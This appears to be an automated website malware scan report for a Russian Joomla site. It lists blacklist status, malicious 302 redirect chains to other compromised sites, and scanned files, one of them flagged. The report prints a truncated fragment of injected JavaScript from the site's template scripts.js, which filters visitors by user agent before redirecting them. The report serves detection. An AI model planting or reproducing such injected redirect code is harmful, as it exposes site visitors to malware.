Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pskovlestnica.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pskovlestnica.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://pskovlestnica.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pskovlestnica.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 11 Oct 2014 07:04:07 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 11 Oct 2014 06:40:34 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.33 | malicious |
Scanned pages/files
Request | Server response | Status |
http://pskovlestnica.ru/ | 200 OK Content-Length: 19745 Content-Type: text/html | clean |
http://pskovlestnica.ru/media/system/js/caption.js | 200 OK Content-Length: 167 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/modules/mod_djimageslider/assets/slider.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/highslide-full.packed.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/easing_equations.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/swfobject.js | 200 OK Content-Length: 27 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/language/ru.js | 200 OK Content-Length: 1637 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/plugins/content/highslide/config/js/highslide-sitesettings.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/templates/lestnov_2.0/js/scripts.js?1402203651 | 200 OK Content-Length: 884 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){
  function stripos (f_haystack, f_needle, f_offset) {
    var haystack = (f_haystack + '').toLowerCase();
    var needle = (f_needle + '').toLowerCase();
    var index = 0;
    if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; }
    return false;
  }
  function ffff_listier_ua(){
    var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/18.0|Firefox/18.0.1|Firefox/17.0|Firefox/12.0|Firefox/25.0|Firefox/24.0|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/25.0.1|Firefox/26.0|Firefox/27.0|Maxthon|MRSPUTNIK|Mini|Firefox/28.0|BlackBerry|PLAYSTATION|Wget|Firefox/27.0.1';
    nevernList = nevernList.split('|');
    var neverbUA = false;
    for (var i in nevernList) {
      if (stripos(navigator.userAgent
Antivirus reports:
http://www.pskovlestnica.ru/plugins/content/joomthumbnail/gallery/jsibox/jsibox_basic.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://pskovlestnica.ru/index.php | 200 OK Content-Length: 19754 Content-Type: text/html | clean |
http://pskovlestnica.ru/catalogue.html | 200 OK Content-Length: 150777 Content-Type: text/html | clean |
http://pskovlestnica.ru/media/system/js/modal.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/components/com_djcatalog2/theme/js/djcatalog2.js | 200 OK Content-Length: 2086 Content-Type: application/x-javascript | clean |
http://www.pskovlestnica.ru/components/com_djcatalog2/theme/js/slimbox-1.58/js/slimbox.js | 200 OK Content-Length: 4691 Content-Type: application/x-javascript | clean |